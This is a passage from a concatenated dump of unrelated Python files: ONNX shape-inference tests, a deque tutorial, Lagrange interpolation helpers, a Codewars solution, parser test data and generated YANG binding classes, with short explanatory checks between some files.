("y", TensorProto.FLOAT, (2, 5, 8))],
[make_node('SoftmaxCrossEntropyLoss', ['x', 'y'], ['z'], reduction='none')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 5, 8))]) # type: ignore
def test_softmax_cross_entropy_mean_NCD1D2(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3, 4, 5)),
("y", TensorProto.FLOAT, (2, 4, 5))],
[make_node('SoftmaxCrossEntropyLoss', ['x', 'y'], ['z'], reduction='mean')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ())]) # type: ignore
def test_celu_function_output_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16))],
[make_node('Celu', ['X'], ['Y'], alpha=2.0)],
[]
)
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 48, 16, 16))])
def prepare_input_initializer_tensors(self, initializer_shape, input_shape): # type: ignore
nodes = [make_node('Add', ['x', 'y'], 'z')]
if initializer_shape is None:
initializer = [] # type: ignore
else:
size = 1
for d in initializer_shape:
size *= d
vals = [0.0] * size
initializer = [make_tensor("x", TensorProto.FLOAT, initializer_shape, vals), # type: ignore
make_tensor("y", TensorProto.FLOAT, initializer_shape, vals)]
if input_shape is None:
inputs = [] # type: ignore
else:
inputs = [helper.make_tensor_value_info('x', TensorProto.FLOAT, input_shape), # type: ignore
helper.make_tensor_value_info('y', TensorProto.FLOAT, input_shape)]
graph = helper.make_graph(nodes, "test", inputs=inputs, outputs=[], initializer=initializer, value_info=[])
return helper.make_model(graph)
def test_infer_with_initializer_without_input_above_ir4(self): # type: () -> None
# For IR version >= 4, a tensor may exist only in the initializer and not in the graph inputs,
# so shape inference should make use of initializer shapes
initializer_shape = (8, 7)
original_model = self.prepare_input_initializer_tensors(initializer_shape, None)
inferred_model = onnx.shape_inference.infer_shapes(original_model, strict_mode=True)
# If shape inference failed, value_info would be empty and pop() would raise IndexError
z_tensor = inferred_model.graph.value_info.pop()
z_shape = (z_tensor.type.tensor_type.shape.dim[0].dim_value, z_tensor.type.tensor_type.shape.dim[1].dim_value)
assert z_shape == initializer_shape
def test_infer_with_initializer_without_input_below_ir4(self): # type: () -> None
# For IR version < 4, initializer tensors must also appear in the graph inputs,
# so shape inference should not take shapes from the initializer alone
# Use (None, None) as the unspecified input shape
initializer_shape = (8, 7)
input_shape = (None, None)
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
original_model.ir_version = 3 # test ir_version < 4
inferred_model = onnx.shape_inference.infer_shapes(original_model, strict_mode=True)
z_tensor = inferred_model.graph.value_info.pop()
z_shape = (z_tensor.type.tensor_type.shape.dim[0].dim_value, z_tensor.type.tensor_type.shape.dim[1].dim_value)
# Since the input shape is not updated from the initializer, the inferred dims stay unset, i.e. (0, 0)
assert z_shape == (0, 0)
def test_infer_initializer_input_mismatch(self): # type: () -> None
# Catch error if initializer and input mismatch
initializer_shape = (8, 7)
input_shape = (4, 3)
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
# Inferred shape and existing shape differ in dimension 0
self.assertRaises(onnx.shape_inference.InferenceError, onnx.shape_inference.infer_shapes, original_model, strict_mode=True)
def test_infer_initializer_input_consistency_all_none(self): # type: () -> None
initializer_shape = (8, 7)
input_shape = (None, None) # acceptable
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
onnx.shape_inference.infer_shapes(original_model, strict_mode=True)
def test_infer_initializer_input_consistency_single_none(self): # type: () -> None
initializer_shape = (8, 7)
input_shape = (None, 7) # acceptable
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
onnx.shape_inference.infer_shapes(original_model, strict_mode=True)
def test_infer_initializer_input_consistency_different_rank(self): # type: () -> None
initializer_shape = (8, 7, 9)
input_shape = (None, 7) # rank 2, mismatching the rank-3 initializer
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
# Inferred shape and existing shape differ in rank: (3) vs (2)
self.assertRaises(onnx.shape_inference.InferenceError, onnx.shape_inference.infer_shapes, original_model, strict_mode=True)
def test_trilu_upper(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('k', TensorProto.INT64, ())],
[make_node('Trilu', ['x', 'k'], ['y'])],
[],
initializer=[make_tensor('k', TensorProto.INT64, (), (2,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 5))]) # type: ignore
def test_trilu_lower(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('k', TensorProto.INT64, ())],
[make_node('Trilu', ['x', 'k'], ['y'], upper=0)],
[],
initializer=[make_tensor('k', TensorProto.INT64, (), (10,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 5))]) # type: ignore
def test_trilu_upper_zero(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT64, (0, 5)),
('k', TensorProto.INT64, ())],
[make_node('Trilu', ['x', 'k'], ['y'], upper=1)],
[],
initializer=[make_tensor('k', TensorProto.INT64, (), (5,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (0, 5))]) # type: ignore
def test_trilu_lower_one(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (3, 1, 5))],
[make_node('Trilu', ['x'], ['y'], upper=0)],
[],)
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT32, (3, 1, 5))]) # type: ignore
def test_batch_norm_train(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('scale', TensorProto.FLOAT, (4,)),
('b', TensorProto.FLOAT, (4,)),
('input_mean', TensorProto.FLOAT, (4,)),
('input_var', TensorProto.FLOAT, (4,))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
['out', 'output_mean', 'output_var'], training_mode=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7)), # type: ignore
                                      make_tensor_value_info('output_mean', TensorProto.FLOAT, (4,)),  # type: ignore
                                      make_tensor_value_info('output_var', TensorProto.FLOAT, (4,)),  # type: ignore
                                      ])

    def test_batch_norm_train_dim_param(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (3, 'C', 5, 6, 7)),
             ('scale', TensorProto.FLOAT, ('C',)),
             ('b', TensorProto.FLOAT, ('C',)),
             ('input_mean', TensorProto.FLOAT, ('C',)),
             ('input_var', TensorProto.FLOAT, ('C',))],
            [make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
                       ['out', 'output_mean', 'output_var'], training_mode=1)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 'C', 5, 6, 7)),  # type: ignore
                                      make_tensor_value_info('output_mean', TensorProto.FLOAT, ('C',)),  # type: ignore
                                      make_tensor_value_info('output_var', TensorProto.FLOAT, ('C',)),  # type: ignore
                                      ])

    def test_batch_norm_train_with_diff_type(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT16, (3, 4, 5, 6, 7)),
             ('scale', TensorProto.FLOAT16, (4,)),
             ('b', TensorProto.FLOAT16, (4,)),
             ('input_mean', TensorProto.FLOAT, (4,)),
             ('input_var', TensorProto.FLOAT, (4,))],
            [make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
                       ['out', 'output_mean', 'output_var'], training_mode=1)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT16, (3, 4, 5, 6, 7)),  # type: ignore
                                      make_tensor_value_info('output_mean', TensorProto.FLOAT, (4,)),  # type: ignore
                                      make_tensor_value_info('output_var', TensorProto.FLOAT, (4,)),  # type: ignore
                                      ])

    def test_batch_norm_test(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
             ('scale', TensorProto.FLOAT, (4,)),
             ('b', TensorProto.FLOAT, (4,)),
             ('input_mean', TensorProto.FLOAT, (4,)),
             ('input_var', TensorProto.FLOAT, (4,))],
            [make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
                       ['out'], training_mode=0)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7))])  # type: ignore

    def test_batch_norm_test_no_dim(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (3, 4, None, None, None)),
             ('scale', TensorProto.FLOAT, (4,)),
             ('b', TensorProto.FLOAT, (4,)),
             ('input_mean', TensorProto.FLOAT, (None,)),
             ('input_var', TensorProto.FLOAT, (4,))],
            [make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
                       ['out'], training_mode=0)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, None, None, None))])  # type: ignore

    def test_batch_norm_train_no_shape(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, None),
             ('scale', TensorProto.FLOAT, None),
             ('b', TensorProto.FLOAT, None),
             ('input_mean', TensorProto.FLOAT, ('C',)),
             ('input_var', TensorProto.FLOAT, ('C',))],
            [make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
                       ['out', 'running_mean', 'running_var'], training_mode=1)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, None),  # type: ignore
                                      make_tensor_value_info('running_mean', TensorProto.FLOAT, ('C',)),  # type: ignore
                                      make_tensor_value_info('running_var', TensorProto.FLOAT, ('C',)),  # type: ignore
                                      ])

    def test_nonzero(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (None,))],
            [make_node('NonZero', ['x'], ['out'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.INT64, (1, None))])  # type: ignore

    def test_nonzero_no_shape(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, None)],
            [make_node('NonZero', ['x'], ['out'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.INT64, (None, None))])  # type: ignore


if __name__ == '__main__':
    unittest.main()
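All of the BatchNormalization cases above exercise one shape rule: the primary output keeps the shape of `x`, and with `training_mode=1` the two extra outputs keep the 1-D channel shape of `input_mean`/`input_var`. The helper below is a hypothetical, simplified restatement of that rule for illustration only — it is not part of onnx and ignores the type checks the real inference performs.

```python
# Toy restatement of the BatchNormalization shape rule the tests check above.
# Shapes are plain tuples; None stands for an unknown dimension, a string for
# a symbolic dim_param such as 'C'.
def batch_norm_output_shapes(x_shape, mean_shape, training_mode):
    if training_mode:
        # Y, running_mean, running_var
        return [x_shape, mean_shape, mean_shape]
    # inference mode: only Y
    return [x_shape]

assert batch_norm_output_shapes((3, 4, 5, 6, 7), (4,), 1) == [(3, 4, 5, 6, 7), (4,), (4,)]
assert batch_norm_output_shapes((3, 'C', 5, 6, 7), ('C',), 1) == [(3, 'C', 5, 6, 7), ('C',), ('C',)]
```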

# --- t_5_data_structures/t_5_1_2_using_lists_as_queues/__init__.py (naokiur/Python-tutorial) ---
from collections import deque
queue = deque(["Eric", "John", "Michel"])
queue.append("Terry")
queue.append("Graham")
print(queue.popleft())
print(queue.popleft())
print(queue)

# --- BackendFunctionalModule/tracking/test_service.py (futurewei-cloud/unno) ---
# TODO: write a test for the service

# --- capd_short/dae_v2/collocation_funcs/lagrange_f.py (BieglersGroup/dae_pyomo) ---
# -*- coding: utf-8 -*-
from __future__ import division
from capd_short.dae_v2.collocation_funcs.cpoinsc import collptsgen

"""
Lagrange interpolating polynomials by David M Thierry
contains lgr, lgry, lgrdot, lgrydot
10/11/2016
"""
__author__ = 'David M Thierry'


def lgr(j, tau, kord, alp, bet):
    tauk = collptsgen(kord, alp, bet)
    tauk.reverse()
    tauk.append(0.)
    tauk.reverse()
    out = 1
    for k in range(0, kord + 1):
        if j != k:
            out *= (tau - tauk[k]) / (tauk[j] - tauk[k])
    return out


def lgry(j, tau, kord, alp, bet):
    tauk = collptsgen(kord, alp, bet)
    tauk.reverse()
    tauk.append(0.)
    tauk.reverse()
    out = 1
    # for legendre [0, K-1]
    if j == 0:
        return 0
    else:
        for k in range(1, kord + 1):
            if j != k:
                out *= (tau - tauk[k]) / (tauk[j] - tauk[k])
        return out


def lgrdot(j, tau, kord, alp, bet):
    tauk = collptsgen(kord, alp, bet)
    tauk.reverse()
    tauk.append(0.)
    tauk.reverse()
    out1 = 1
    for k in range(0, kord + 1):
        if k != j:
            out1 *= 1 / (tauk[j] - tauk[k])
    out2 = 1
    out3 = 0
    for m in range(0, kord + 1):
        if m != j:
            out2 = 1  # initialize multiplication
            for n in range(0, kord + 1):
                if n != m and n != j:
                    out2 *= tau - tauk[n]
                # elif n == j:
                #     print("we've got a problem here")
            out3 += out2
    out = out3 * out1
    return out


def lgrydot(j, tau, kord, alp, bet):
    tauk = collptsgen(kord, alp, bet)
    tauk.reverse()
    tauk.append(0.)
    tauk.reverse()
    out1 = 1
    for k in range(1, kord + 1):
        if k != j:
            out1 *= 1 / (tauk[j] - tauk[k])
    out2 = 1
    out3 = 0
    for m in range(1, kord + 1):
        if m != j:
            out2 = 1  # initialize multiplication
            for n in range(1, kord + 1):
                if n != m and n != j:
                    out2 *= tau - tauk[n]
                # elif n == j:
                #     print("we've got a problem here")
            out3 += out2
    out = out3 * out1
    return out
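`lgr` builds the standard Lagrange cardinal basis, l_j(tau) = prod_{k != j} (tau - tau_k) / (tau_j - tau_k), which satisfies l_j(tau_k) = 1 when j == k and 0 otherwise. The self-contained check below verifies that cardinality property with a hand-picked node set standing in for the `collptsgen` output (the specific node values are illustrative assumptions; the property holds for any distinct nodes):

```python
# Cardinality check for the Lagrange basis product that lgr implements.
def lagrange_basis(j, tau, nodes):
    out = 1.0
    for k, tk in enumerate(nodes):
        if k != j:
            out *= (tau - tk) / (nodes[j] - tk)
    return out

# tau_0 = 0 plus three illustrative collocation-like points
nodes = [0.0, 0.155051, 0.644949, 1.0]
for j in range(len(nodes)):
    for k, tk in enumerate(nodes):
        expected = 1.0 if j == k else 0.0
        # l_j(tau_k) = delta_jk
        assert abs(lagrange_basis(j, tk, nodes) - expected) < 1e-9
```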

# --- bgflow/nn/training/__init__.py (michellab/bgflow) ---
from .trainers import *

# --- 7KYU/int_diff.py (yaznasivasai/python_codewars) ---
from itertools import combinations

def int_diff(lst: list, n: int) -> int:
    return sum([1 for i in list(combinations(lst, 2)) if abs(i[0]-i[1]) == n])
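`int_diff` counts unordered pairs whose absolute difference equals `n`; duplicates in the input produce distinct pairs. Restated here so the snippet runs standalone, with an example input:

```python
from itertools import combinations

def int_diff(lst: list, n: int) -> int:
    # count every 2-combination (i, j) with |i - j| == n
    return sum([1 for i in list(combinations(lst, 2)) if abs(i[0] - i[1]) == n])

# [1, 1, 5, 6, 9, 16, 27], n = 4: qualifying pairs are (1, 5), (1, 5), (5, 9)
assert int_diff([1, 1, 5, 6, 9, 16, 27], 4) == 3
```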

# --- torchio/transforms/preprocessing/intensity/__init__.py (nwschurink/torchio) ---
from .normalization_transform import NormalizationTransform

# --- pitop/miniscreen/__init__.py (pi-top/pi-top-Python-SDK) ---
from .miniscreen import Miniscreen

# --- src/UnitTests/TestData/Grammar/YieldFromStmtIllegal.py (jamesralstin/python-language-server) ---
yield from 1

def f():
    return 42
    yield from 1

def f():
    yield from 1
    return 42

def f():
    yield from

def f():
    yield from 1, 2, 3

# --- pymcws/api/__init__.py (kenomaerz/pyMCWS) ---
from pymcws.utils import transform_unstructured_response

def alive(media_server):
    response = media_server.send_request("Alive")
    return transform_unstructured_response(response)

# --- pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/__init__.py (shivharis/pybind) ---
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import ldp_fec_summary
import ldp_fec_prefixes
import ldp_fec_vcs
import ldp_fec_prefix_longer
import ldp_fec_vcid
import ldp_fec_prefix_prefix


class fec(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module brocade-mpls-operational - based on the path /mpls-state/ldp/fec. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.

  YANG Description:
  """
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__ldp_fec_summary','__ldp_fec_prefixes','__ldp_fec_vcs','__ldp_fec_prefix_longer','__ldp_fec_vcid','__ldp_fec_prefix_prefix',)

  _yang_name = 'fec'
  _rest_name = 'fec'

  _pybind_generated_by = 'container'
  def __init__(self, *args, **kwargs):

    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False

    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False
    self.__ldp_fec_prefix_longer = YANGDynClass(base=YANGListType("prefix",ldp_fec_prefix_longer.ldp_fec_prefix_longer, yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='prefix', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
    self.__ldp_fec_prefix_prefix = YANGDynClass(base=ldp_fec_prefix_prefix.ldp_fec_prefix_prefix, is_container='container', presence=False, yang_name="ldp-fec-prefix-prefix", rest_name="ldp-fec-prefix-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-prefix-ldp-fec-prefix-prefix-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
    self.__ldp_fec_vcid = YANGDynClass(base=YANGListType("vc_id",ldp_fec_vcid.ldp_fec_vcid, yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='vc-id', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
    self.__ldp_fec_summary = YANGDynClass(base=ldp_fec_summary.ldp_fec_summary, is_container='container', presence=False, yang_name="ldp-fec-summary", rest_name="ldp-fec-summary", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-summary', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
    self.__ldp_fec_prefixes = YANGDynClass(base=ldp_fec_prefixes.ldp_fec_prefixes, is_container='container', presence=False, yang_name="ldp-fec-prefixes", rest_name="ldp-fec-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefixes', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
    self.__ldp_fec_vcs = YANGDynClass(base=ldp_fec_vcs.ldp_fec_vcs, is_container='container', presence=False, yang_name="ldp-fec-vcs", rest_name="ldp-fec-vcs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcs', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)

    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)
  def _path(self):
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return [u'mpls-state', u'ldp', u'fec']

  def _rest_path(self):
    if hasattr(self, "_parent"):
      if self._rest_name:
        return self._parent._rest_path()+[self._rest_name]
      else:
        return self._parent._rest_path()
    else:
      return [u'mpls-state', u'ldp', u'fec']
  def _get_ldp_fec_summary(self):
    """
    Getter method for ldp_fec_summary, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_summary (container)
    """
    return self.__ldp_fec_summary

  def _set_ldp_fec_summary(self, v, load=False):
    """
    Setter method for ldp_fec_summary, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_summary (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ldp_fec_summary is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ldp_fec_summary() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=ldp_fec_summary.ldp_fec_summary, is_container='container', presence=False, yang_name="ldp-fec-summary", rest_name="ldp-fec-summary", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-summary', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ldp_fec_summary must be of a type compatible with container""",
          'defined-type': "container",
          'generated-type': """YANGDynClass(base=ldp_fec_summary.ldp_fec_summary, is_container='container', presence=False, yang_name="ldp-fec-summary", rest_name="ldp-fec-summary", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-summary', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
        })

    self.__ldp_fec_summary = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ldp_fec_summary(self):
    self.__ldp_fec_summary = YANGDynClass(base=ldp_fec_summary.ldp_fec_summary, is_container='container', presence=False, yang_name="ldp-fec-summary", rest_name="ldp-fec-summary", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-summary', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
  def _get_ldp_fec_prefixes(self):
    """
    Getter method for ldp_fec_prefixes, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes (container)
    """
    return self.__ldp_fec_prefixes

  def _set_ldp_fec_prefixes(self, v, load=False):
    """
    Setter method for ldp_fec_prefixes, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ldp_fec_prefixes is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ldp_fec_prefixes() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=ldp_fec_prefixes.ldp_fec_prefixes, is_container='container', presence=False, yang_name="ldp-fec-prefixes", rest_name="ldp-fec-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefixes', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ldp_fec_prefixes must be of a type compatible with container""",
          'defined-type': "container",
          'generated-type': """YANGDynClass(base=ldp_fec_prefixes.ldp_fec_prefixes, is_container='container', presence=False, yang_name="ldp-fec-prefixes", rest_name="ldp-fec-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefixes', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
        })

    self.__ldp_fec_prefixes = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ldp_fec_prefixes(self):
    self.__ldp_fec_prefixes = YANGDynClass(base=ldp_fec_prefixes.ldp_fec_prefixes, is_container='container', presence=False, yang_name="ldp-fec-prefixes", rest_name="ldp-fec-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefixes', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
  def _get_ldp_fec_vcs(self):
    """
    Getter method for ldp_fec_vcs, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_vcs (container)
    """
    return self.__ldp_fec_vcs

  def _set_ldp_fec_vcs(self, v, load=False):
    """
    Setter method for ldp_fec_vcs, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_vcs (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ldp_fec_vcs is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ldp_fec_vcs() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=ldp_fec_vcs.ldp_fec_vcs, is_container='container', presence=False, yang_name="ldp-fec-vcs", rest_name="ldp-fec-vcs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcs', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ldp_fec_vcs must be of a type compatible with container""",
          'defined-type': "container",
          'generated-type': """YANGDynClass(base=ldp_fec_vcs.ldp_fec_vcs, is_container='container', presence=False, yang_name="ldp-fec-vcs", rest_name="ldp-fec-vcs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcs', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
        })

    self.__ldp_fec_vcs = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ldp_fec_vcs(self):
    self.__ldp_fec_vcs = YANGDynClass(base=ldp_fec_vcs.ldp_fec_vcs, is_container='container', presence=False, yang_name="ldp-fec-vcs", rest_name="ldp-fec-vcs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcs', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
  def _get_ldp_fec_prefix_longer(self):
    """
    Getter method for ldp_fec_prefix_longer, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefix_longer (list)
    """
    return self.__ldp_fec_prefix_longer

  def _set_ldp_fec_prefix_longer(self, v, load=False):
    """
    Setter method for ldp_fec_prefix_longer, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefix_longer (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ldp_fec_prefix_longer is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ldp_fec_prefix_longer() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
